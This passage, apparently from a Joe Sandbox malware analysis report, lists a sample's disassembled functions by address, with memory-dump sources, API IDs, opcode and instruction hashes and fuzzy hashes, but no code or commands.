                                                    • Instruction Fuzzy Hash: 82517822B187E386E7208E35AC0176D6B91F745BA8F4C8239CB9C9BAD5DFBDD4448700
                                                    Function 00007FF652EF1720 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                    • String ID:
                                                    • API String ID: 1010374628-0
                                                    • Opcode ID: d763eeadde26d203d3eed894b7e241bb7bf0a3b788ff63a0cf3fb266a06eef05
                                                    • Instruction ID: c46ad14ccd6a769773a312abc0aa33df495d26999e089fda9b8d00d31b0c31a8
                                                    • Opcode Fuzzy Hash: d763eeadde26d203d3eed894b7e241bb7bf0a3b788ff63a0cf3fb266a06eef05
                                                    • Instruction Fuzzy Hash: F102C321E0D66B40FA559B21BC1127B2691AF01BA8F4C463DDD6DEB7D5EEFCE4418B00
                                                    Function 00007FF652EEE80C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: gfffffff
                                                    • API String ID: 0-1523873471
                                                    • Opcode ID: ce984bed762576d5ac079d260fe98dbb5d2c0c9497d8241e3c95b971abe0b5e7
                                                    • Instruction ID: 588bc1b0d5564f5c74c5efe19bb6be103776abf6f4d5062ede218bc0adac3949
                                                    • Opcode Fuzzy Hash: ce984bed762576d5ac079d260fe98dbb5d2c0c9497d8241e3c95b971abe0b5e7
                                                    • Instruction Fuzzy Hash: 3BA16763B087D786EB21CB25A8107AA7B91AB547A8F0C8039DE8D97785EE7DD501C701
                                                    Function 00007FF652EE8EF4 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: TMP
                                                    • API String ID: 3215553584-3125297090
                                                    • Opcode ID: 227a240b370b15b1266a0cc9d4416acc6519c25bf7b5095cb295345a6af5b08f
                                                    • Instruction ID: 675baf1c15aaa097e1d99a27f58be1b770ae39ea97b397ff78adaf8c314ec3e7
                                                    • Opcode Fuzzy Hash: 227a240b370b15b1266a0cc9d4416acc6519c25bf7b5095cb295345a6af5b08f
                                                    • Instruction Fuzzy Hash: 8851AC11B0862B41EE64EA276D5217A62D26F84B9CF4C413DDE0EE7796EEBCE4428205
                                                    Function 00007FF652EF42D0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: ed995d9d252c3e0c61107ed1ba5c48f1392176915e7fcf845d28b2722b2e2d45
                                                    • Instruction ID: 685e9cdf3108797b855975004f5eb72bfd6dd4be17945d4daf7baef9fe54b760
                                                    • Opcode Fuzzy Hash: ed995d9d252c3e0c61107ed1ba5c48f1392176915e7fcf845d28b2722b2e2d45
                                                    • Instruction Fuzzy Hash: 8EB09220E17A52C6FA086B51BCC221822A47F58714FE8507CC00DA2320DEAC20F58711
                                                    Function 00007FF652EE3ED0 Relevance: .3, Instructions: 327COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ca9df69fd1c27fd416770dca946a20fccf44885df857cf64186a4c680355c85b
                                                    • Instruction ID: 0be488e82baf7efbd1da179c1776c963540dd827ffba0e05bd42e4fffff5921f
                                                    • Opcode Fuzzy Hash: ca9df69fd1c27fd416770dca946a20fccf44885df857cf64186a4c680355c85b
                                                    • Instruction Fuzzy Hash: 51D1BD72A0866386EB68CE2A995027D27A0EF45B4CF1C423DCE0DA77D5DFB9E841D341
                                                    Function 00007FF652ED92D0 Relevance: .3, Instructions: 287COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6d76246942c46f132312ebc4a4bc27c309f6729675ee6fb805fd22939f347a0
                                                    • Instruction ID: 2775e8dcc9821d0ec00faa479e907325a0bc7506000da16572eff4aa8de605a7
                                                    • Opcode Fuzzy Hash: a6d76246942c46f132312ebc4a4bc27c309f6729675ee6fb805fd22939f347a0
                                                    • Instruction Fuzzy Hash: F1C1A4722141F14BD2C9EB29E86957E77A1F7C834DBC8403AEB8B57B8AC63CA114D710
                                                    Function 00007FF652EE3540 Relevance: .2, Instructions: 241COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa501f5897fa8170c1c3089a9165536d111e8d2735d862654f88cabfcab8bd87
                                                    • Instruction ID: bec81f0f539e93b9dffc5ab286f0e6000af2dcc7d967dd51d8fad033e0466ad4
                                                    • Opcode Fuzzy Hash: fa501f5897fa8170c1c3089a9165536d111e8d2735d862654f88cabfcab8bd87
                                                    • Instruction Fuzzy Hash: 18B16DB2A087A785E7688F39C85023D3BA0E745F4CF294139DA4EA7395DFBAD841C744
                                                    Function 00007FF652EEF320 Relevance: .2, Instructions: 198COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dde3b387bb0edac5d3a7572aaf71fcdce3ba0ac9d1c4353072e234eccf42a557
                                                    • Instruction ID: 1fb8f5a46c5dd9c0961033635fdb20487dea7f30d15ca72c77329c6b38b396b2
                                                    • Opcode Fuzzy Hash: dde3b387bb0edac5d3a7572aaf71fcdce3ba0ac9d1c4353072e234eccf42a557
                                                    • Instruction Fuzzy Hash: 41810472A0C79246E774CF19A84037A7A91FB85798F58423DDB8D93B99DF7DD8048B00
                                                    Function 00007FF652EF7550 Relevance: .2, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 9914cb7746023329a97bf4181aa287deee78f55ee5d35b62d6e15dbc326fdfe6
                                                    • Instruction ID: ab779076c67f2f7d7e9fa6be7d7aafe336b4ea5bc258dd7d7005352f636ef8c6
                                                    • Opcode Fuzzy Hash: 9914cb7746023329a97bf4181aa287deee78f55ee5d35b62d6e15dbc326fdfe6
                                                    • Instruction Fuzzy Hash: B661F622E2C2A346FB648B2CAC5467B6681AF40768F5D063DE65DD77D5EEFDE8008700
                                                    Function 00007FF652EE2A94 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 431273df7c005eff8b086499786a7f8af66af839407972891033f6f8b32510fa
                                                    • Instruction ID: ac8a276d0c3fe5834fac698bacdb9c95250dac103c616440fc8b4ffd6f2dfdac
                                                    • Opcode Fuzzy Hash: 431273df7c005eff8b086499786a7f8af66af839407972891033f6f8b32510fa
                                                    • Instruction Fuzzy Hash: BA516736A18A6385E7248F29D85427937A0EB54F6CF2C4139CE4DA7794CFBAE843D740
                                                    Function 00007FF652EE2274 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3986d2e28db3ad4c814196551e744b7f12e089580c78501851383343d29f5119
                                                    • Instruction ID: dd9a50ef98d64428923700380f2ce9ee3f1ab7e323e43337f80ea19c56562bf3
                                                    • Opcode Fuzzy Hash: 3986d2e28db3ad4c814196551e744b7f12e089580c78501851383343d29f5119
                                                    • Instruction Fuzzy Hash: FD516576A1866386E7248F29D44423837A1FB59F5CF285139CE4DA7794CFBAE843CB40
                                                    Function 00007FF652EE2684 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a7def00a57181835e1b5755574f212d41c435eb46ac8bcc91c00ca4f50edce3
                                                    • Instruction ID: a3ef9278f648972a296942d77fb99f66b3cc4f4c9b31768ebde8f44ee2aac3c2
                                                    • Opcode Fuzzy Hash: 0a7def00a57181835e1b5755574f212d41c435eb46ac8bcc91c00ca4f50edce3
                                                    • Instruction Fuzzy Hash: 0D516476A1866386E7248F29C84163837A0EB55B6CF2C4139CE4DA7795CFBAEC43C740
                                                    Function 00007FF652EE2480 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b37b721d2520797c932084b48cf8e5c5b4bbfd8b4955e3aae9fbd8879836657
                                                    • Instruction ID: 81c7d8385842fcf88749fe6c1b261b9e8ac78ec3b8103d5d15cd1db69bda840b
                                                    • Opcode Fuzzy Hash: 5b37b721d2520797c932084b48cf8e5c5b4bbfd8b4955e3aae9fbd8879836657
                                                    • Instruction Fuzzy Hash: B6518176A1866386E7248F29D85063827A1EB85B5CF285139CE4DA77A4CF7AEC42C740
                                                    Function 00007FF652EE2890 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 56eab1984f79c1160248cb97b5e30aec2666dd062f10dae5dc3084fdbc1595d5
                                                    • Instruction ID: def283647b4244bc3c9a443eb7b2b8fb6dd8ae1097ac82f839e404c7963e9fdb
                                                    • Opcode Fuzzy Hash: 56eab1984f79c1160248cb97b5e30aec2666dd062f10dae5dc3084fdbc1595d5
                                                    • Instruction Fuzzy Hash: 0D517336A1866685EB358F29C84063837A1EB55F5CF2C5139CA8DA7798CF7AE842C740
                                                    Function 00007FF652EE2070 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4a792dd5f357ba9ab053cb868b8428acf2d0115ad083e523ed5123ef832f09c
                                                    • Instruction ID: 7fd06123434d9d1e48cb113f15bdf35dd33a4bf04496747920bdda32c9939fbc
                                                    • Opcode Fuzzy Hash: e4a792dd5f357ba9ab053cb868b8428acf2d0115ad083e523ed5123ef832f09c
                                                    • Instruction Fuzzy Hash: DA519636A1866686E7248F29D84033837A1EB49B5CF2C4135CE4DA7799CFBAED53C740
                                                    Function 00007FF652EE6750 Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                    • Instruction ID: 969183150f2b72366f533932a91e23538425c24740dcb2da66d9abe59a31123d
                                                    • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                    • Instruction Fuzzy Hash: 8741E562C0D7BB05E9958D584D046B46680EF23BA8E1C52BCCCBAF73C7CD9DA58AC205
                                                    Function 00007FF652EEAC50 Relevance: .1, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: f111dc0bb75c4fd458f0a84966b8cb0fe478d08570652a426d7f95957c6d4c4f
                                                    • Instruction ID: 9411d7b055d53e4d7f79ffe44894feaba08b39d26498794a47416ad54b19eeda
                                                    • Opcode Fuzzy Hash: f111dc0bb75c4fd458f0a84966b8cb0fe478d08570652a426d7f95957c6d4c4f
                                                    • Instruction Fuzzy Hash: E341E572B14A6582EF04CF6AED155A973A1BB48FD8B0D913ADE0DE7B58DE7CD1428300
                                                    Function 00007FF652EE84BC Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e0b9409b015bea46d2036294c0136b3200ade656a83a3c77deb383565566a918
                                                    • Instruction ID: 155a00ca01d18303f6f6624566e5db93cd3ea4f40d275aed2ed31abce6e52c94
                                                    • Opcode Fuzzy Hash: e0b9409b015bea46d2036294c0136b3200ade656a83a3c77deb383565566a918
                                                    • Instruction Fuzzy Hash: 8331A332B08B5342E764DF256C4017E6696AF84BE4F18423DEA9DA7BE5DFBCD0028604
                                                    Function 00007FF652EFA620 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3f3f1020485e8a41a296fc930dbc96221e618d45f39aaa63d951921bdf06b5a
                                                    • Instruction ID: 1badb4e325469cf1dc2b9747bd713443254134327a5916339b4caef9366d6660
                                                    • Opcode Fuzzy Hash: c3f3f1020485e8a41a296fc930dbc96221e618d45f39aaa63d951921bdf06b5a
                                                    • Instruction Fuzzy Hash: C6F068B1B182658ADB988F69F80362977D0F708384F848539D58DC7B04DA7DD0609F04
                                                    Function 00007FF652EDCA9C Relevance: .0, Instructions: 2COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
